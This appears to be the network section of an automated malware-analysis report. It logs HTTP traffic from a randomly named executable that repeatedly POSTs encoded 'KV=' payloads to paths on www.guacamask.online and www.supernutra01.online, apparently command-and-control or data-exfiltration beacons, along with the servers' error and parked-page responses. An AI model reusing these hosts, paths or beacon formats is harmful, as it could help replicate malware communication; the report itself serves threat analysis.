                                                                                                                        Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 4b 56 4c 66 34 4c 35 35 70 65 55 46 36 36 62 58 46 43 64 69 33 33 58 4e 34 6a 6d 72 63 32 75 63 32 2d 57 30 50 62 77 74 71 6a 63 6c 51 6f 67 79 5a 57 55 35 5f 6c 77 67 5f 4e 75 43 66 62 37 43 59 46 68 77 36 72 46 68 75 74 43 48 74 32 70 72 72 6e 38 77 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                                                                        Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="hKVLf4L55peUF66bXFCdi33XN4jmrc2uc2-W0PbwtqjclQogyZWU5_lwg_NuCfb7CYFhw6rFhutCHt2prrn8wg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                                                                        Nov 20, 2024 16:54:49.320808887 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: y></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        9192.168.2.1149905208.91.197.27803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:55.114777088 CET786OUTPOST /rfhq/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.guacamask.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.guacamask.online
                                                                                                                        Referer: http://www.guacamask.online/rfhq/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 62 41 4f 66 69 65 69 46 6c 63 56 38 64 69 65 63 6f 71 46 4c 6a 56 32 58 2b 35 73 6a 4e 41 66 34 41 63 2f 65 5a 72 78 47 4b 6f 34 58 75 64 43 71 38 70 62 71 61 6e 6c 67 4f 6e 41 39 34 57 72 35 38 7a 45 4b 6a 31 4a 58 30 52 38 65 61 43 33 63 62 66 37 74 66 53 53 2f 63 57 38 6c 39 41 6f 69 42 56 44 69 74 42 48 36 58 58 70 69 45 68 6a 68 72 61 46 71 51 6b 47 6e 45 61 74 45 46 2b 54 37 65 59 70 49 6d 54 43 44 31 55 55 58 44 73 71 55 70 4c 53 79 54 4f 67 50 30 53 42 51 59 58 51 55 6f 6d 4b 4d 34 78 74 64 76 70 66 65 39 49 7a 36 61 33 70 4a 43 52 44 36 54 70 39 5a 34 45 39 39 4a 51 3d 3d
                                                                                                                        Data Ascii: KV=bAOfieiFlcV8diecoqFLjV2X+5sjNAf4Ac/eZrxGKo4XudCq8pbqanlgOnA94Wr58zEKj1JX0R8eaC3cbf7tfSS/cW8l9AoiBVDitBH6XXpiEhjhraFqQkGnEatEF+T7eYpImTCD1UUXDsqUpLSyTOgP0SBQYXQUomKM4xtdvpfe9Iz6a3pJCRD6Tp9Z4E99JQ==


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        10192.168.2.1149912208.91.197.27803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:57.781326056 CET806OUTPOST /rfhq/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.guacamask.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.guacamask.online
                                                                                                                        Referer: http://www.guacamask.online/rfhq/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 62 41 4f 66 69 65 69 46 6c 63 56 38 63 44 75 63 76 4c 46 4c 33 46 32 51 37 35 73 6a 43 67 66 30 41 63 37 65 5a 76 42 6f 4c 65 6f 58 76 38 79 71 39 71 44 71 55 48 6c 67 47 48 41 34 6d 6d 72 45 38 30 4d 64 6a 31 31 58 30 52 34 65 61 47 7a 63 59 73 44 69 63 69 53 35 51 32 38 6e 7a 67 6f 69 42 56 44 69 74 41 6e 55 58 54 4e 69 46 51 54 68 72 2b 52 70 4f 55 47 6b 46 61 74 45 42 2b 53 38 65 59 70 36 6d 53 65 6c 31 57 38 58 44 70 47 55 70 65 2b 74 5a 4f 67 46 77 53 41 64 5a 45 41 61 6c 78 54 71 68 42 35 57 37 59 48 53 38 4f 2b 67 4b 55 67 65 42 43 4c 34 48 50 63 70 78 31 59 30 53 55 4e 48 72 31 54 4d 6c 71 64 77 7a 30 75 64 74 6b 6d 45 51 69 38 3d
                                                                                                                        Data Ascii: KV=bAOfieiFlcV8cDucvLFL3F2Q75sjCgf0Ac7eZvBoLeoXv8yq9qDqUHlgGHA4mmrE80Mdj11X0R4eaGzcYsDiciS5Q28nzgoiBVDitAnUXTNiFQThr+RpOUGkFatEB+S8eYp6mSel1W8XDpGUpe+tZOgFwSAdZEAalxTqhB5W7YHS8O+gKUgeBCL4HPcpx1Y0SUNHr1TMlqdwz0udtkmEQi8=


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        11192.168.2.1149919208.91.197.27803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:00.441749096 CET1819OUTPOST /rfhq/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.guacamask.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.guacamask.online
                                                                                                                        Referer: http://www.guacamask.online/rfhq/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 62 41 4f 66 69 65 69 46 6c 63 56 38 63 44 75 63 76 4c 46 4c 33 46 32 51 37 35 73 6a 43 67 66 30 41 63 37 65 5a 76 42 6f 4c 65 67 58 75 4f 36 71 38 4b 2f 71 58 48 6c 67 49 6e 41 35 6d 6d 72 6a 38 31 70 31 6a 31 35 48 30 58 6b 65 61 6a 6e 63 64 64 44 69 48 79 53 35 59 57 38 6d 39 41 6f 37 42 56 54 59 74 41 58 55 58 54 4e 69 46 54 4c 68 74 71 46 70 4d 55 47 6e 45 61 74 49 46 2b 53 59 65 63 46 71 6d 53 61 54 32 6d 63 58 44 4a 57 55 72 73 47 74 45 65 67 44 39 79 42 4f 5a 45 4e 59 6c 31 37 78 68 43 6c 73 37 59 2f 53 2f 5a 58 43 52 67 6f 44 44 51 36 4d 54 38 6b 4a 30 51 6b 54 54 7a 35 77 6c 30 65 2f 2b 2b 5a 65 35 30 7a 34 2b 33 32 61 4f 31 43 73 75 39 4e 4c 43 32 78 78 6e 59 64 30 65 6e 35 57 41 6a 77 72 47 6f 67 34 46 38 68 70 55 51 53 39 6d 66 46 6f 4a 32 73 76 38 38 52 6f 7a 42 4e 52 2f 48 74 61 36 6b 74 71 59 63 66 72 33 66 4f 6d 55 63 34 65 34 5a 55 68 61 4a 6b 46 68 42 78 4b 51 35 74 6a 4e 68 67 42 50 43 6b 65 54 77 41 61 51 52 47 55 4c 66 52 74 41 67 78 66 31 38 53 62 45 6b 65 4f 55 56 48 [TRUNCATED]
                                                                                                                        Data Ascii: KV=bAOfieiFlcV8cDucvLFL3F2Q75sjCgf0Ac7eZvBoLegXuO6q8K/qXHlgInA5mmrj81p1j15H0XkeajncddDiHyS5YW8m9Ao7BVTYtAXUXTNiFTLhtqFpMUGnEatIF+SYecFqmSaT2mcXDJWUrsGtEegD9yBOZENYl17xhCls7Y/S/ZXCRgoDDQ6MT8kJ0QkTTz5wl0e/++Ze50z4+32aO1Csu9NLC2xxnYd0en5WAjwrGog4F8hpUQS9mfFoJ2sv88RozBNR/Hta6ktqYcfr3fOmUc4e4ZUhaJkFhBxKQ5tjNhgBPCkeTwAaQRGULfRtAgxf18SbEkeOUVHFUm1v/ToufZwSy2sGr3+PPw5ixyOB/BNuGg+xPrpa+W+Vg2ld0PYCswJhn8TGW/OiKIzOvN/Mp/pVndq+1bXrewsry7eWzZqGcm7sjMpb7+31+W/xWBEkb3w3DiRBlSJS+rY5zLBDr5ObyBeEbfOdyHD76xT4+0iTUKbohO+XvpIbsa+EdP3X/Gxr5hcJO5JWlxAQPDvzQ7X49rrOt+SfW6EW9CWxH4b6oN3leHD1gHdQ9vlcvUEMkQtzKXh6U4qnjm8dt6R+3n8X8xwysvdXD4uuYMBw+e5nk2i0hjC+O9Z92+Ws6bl/wvICYoYBPC/DXGZLEzzSZnH8Z24UH2pfe48feuPrZlv5KYu8YRGTICRc9O/XX3DMQDusr7WReFZUgIMnOG/h4oXHlhVjKFa/04qmuwVenBlkjbnERlrCC6ba1/Ydzrj4C49eF1zw7u17cmzo4M5GLuo9Y0nNaEnLPh+KDVOD5bj2/qGe1fOSqcopFctzznU5fn40Auwyj6G6zypmQ6lnB0YF1zh/yys9q6tHPAcYv3zJ+z6jLv65II8FHkuDUJlnRYrxATI1jueHaFw2Upd6Wbx/WOu8rc0oSN4XadDWjhrTkRYqUCZXT+1UnJt+VggAZrz7eF7afxfFQS89Q4ejEnoRO+wH3CI3Nj64wmR/jISmi [TRUNCATED]


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        12192.168.2.1149925208.91.197.27803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:03.115202904 CET508OUTGET /rfhq/?KV=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBEiy3WEQe219nV0S5mknFQQ1hIDuAzNxIBCE=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.guacamask.online
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:55:06.930114031 CET1236INHTTP/1.1 200 OK
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:04 GMT
                                                                                                                        Server: Apache
                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                        Set-Cookie: vsid=911vr4796637042727196; expires=Mon, 19-Nov-2029 15:55:04 GMT; Max-Age=157680000; path=/; domain=www.guacamask.online; HttpOnly
                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_HgE7neUuKvOb5D2hXMtYQw1KQ+5y23WBIEe5XvWT5CBE8InVOF+6yu3L8xNNJ1GyHWlyNF/eurHzqI0OuycxXg==
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 62 38 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d
                                                                                                                        Data Ascii: b8df<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                                                                                        Nov 20, 2024 16:55:06.930134058 CET109INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72
                                                                                                                        Data Ascii: <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprApplie
                                                                                                                        Nov 20, 2024 16:55:06.930278063 CET1236INData Raw: 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69
                                                                                                                        Data Ascii: sGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in
                                                                                                                        Nov 20, 2024 16:55:06.930301905 CET1236INData Raw: 72 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f
                                                                                                                        Data Ascii: return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).
                                                                                                                        Nov 20, 2024 16:55:06.930315018 CET1236INData Raw: 70 65 72 43 61 73 65 28 29 29 7b 6f 3d 22 65 6e 22 3b 62 72 65 61 6b 7d 7d 7d 62 3d 22 5f 22 2b 6f 7d 66 75 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76
                                                                                                                        Data Ascii: perCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}
                                                                                                                        Nov 20, 2024 16:55:06.930357933 CET1236INData Raw: 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 69 66 28 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b
                                                                                                                        Data Ascii: "text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if
                                                                                                                        Nov 20, 2024 16:55:06.930371046 CET1236INData Raw: 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77 2e 63 6d
                                                                                                                        Data Ascii: w&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1")
                                                                                                                        Nov 20, 2024 16:55:06.930382967 CET1236INData Raw: 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 7d 7d 7d
                                                                                                                        Data Ascii: a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","usnat","usca","usva","usco","usut",
                                                                                                                        Nov 20, 2024 16:55:06.930393934 CET1236INData Raw: 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 64 2e 64 61 74 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3b 74 72 79 7b 76 61 72 20 63 3d 61 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 64 2e 64 61 74 61 29 3a 64 2e 64
                                                                                                                        Data Ascii: dler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parameter,function(h,g){var e={__cmpRetur
                                                                                                                        Nov 20, 2024 16:55:06.930448055 CET1236INData Raw: 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29 29 7b 77 69 6e 64 6f 77 5b 61 5d 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3b 77 69 6e 64 6f 77 5b 61
                                                                                                                        Data Ascii: f(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=function(a){if(!(a in window)||(typeof(
                                                                                                                        Nov 20, 2024 16:55:07.050081015 CET1236INData Raw: 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 61 63 61 6d 61 73 6b 2e 6f 6e 6c 69 6e 65 2f 70 78 2e
                                                                                                                        Data Ascii: ch=1"></script><script type="text/javascript" src="http://www.guacamask.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        13192.168.2.1149948172.67.220.36803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:12.960253000 CET795OUTPOST /jt56/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.supernutra01.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.supernutra01.online
                                                                                                                        Referer: http://www.supernutra01.online/jt56/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 36 4e 71 6a 49 2b 76 79 6b 48 78 31 33 65 72 73 6d 63 75 69 68 76 68 34 56 79 4c 63 49 75 33 49 78 6e 6c 71 58 46 32 33 44 65 47 4a 7a 79 45 30 42 6d 37 46 38 53 79 67 39 2b 6a 6b 48 38 55 6e 75 37 30 70 38 49 4d 70 6e 71 58 43 6f 6b 7a 74 4e 4b 6c 4e 57 77 39 56 6e 53 34 77 56 2b 36 4d 55 37 2b 38 68 4d 6f 42 49 65 2b 7a 78 6c 47 41 44 4c 34 64 51 5a 6b 69 2f 2f 56 7a 4f 71 4d 32 79 38 32 70 6d 4e 55 51 38 50 53 54 44 7a 33 42 39 69 69 67 42 45 4f 31 2b 6f 2f 7a 76 34 63 6b 6b 5a 61 54 34 48 51 4b 79 6b 7a 6a 47 48 49 4a 75 42 56 4b 74 79 77 70 66 71 43 4b 31 61 64 6c 6a 67 3d 3d
                                                                                                                        Data Ascii: KV=6NqjI+vykHx13ersmcuihvh4VyLcIu3IxnlqXF23DeGJzyE0Bm7F8Syg9+jkH8Unu70p8IMpnqXCokztNKlNWw9VnS4wV+6MU7+8hMoBIe+zxlGADL4dQZki//VzOqM2y82pmNUQ8PSTDz3B9iigBEO1+o/zv4ckkZaT4HQKykzjGHIJuBVKtywpfqCK1adljg==
                                                                                                                        Nov 20, 2024 16:55:14.343144894 CET1236INHTTP/1.1 405 Not Allowed
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:14 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BbfpvCicva%2BYL7236uuVdjPE15rMjzR8%2FmWZ2tKjScTSaBpc4fzcw1ZnX47g7w3PhbiDPiBHvokszis1TIMn33iZlrQ6RH9HX11s1pjfW2QsXUsKhmivRJyp%2FQZJ4a1NmGRCLBaDT81W7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e599f83fb0c0f46-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1663&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                        Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frien
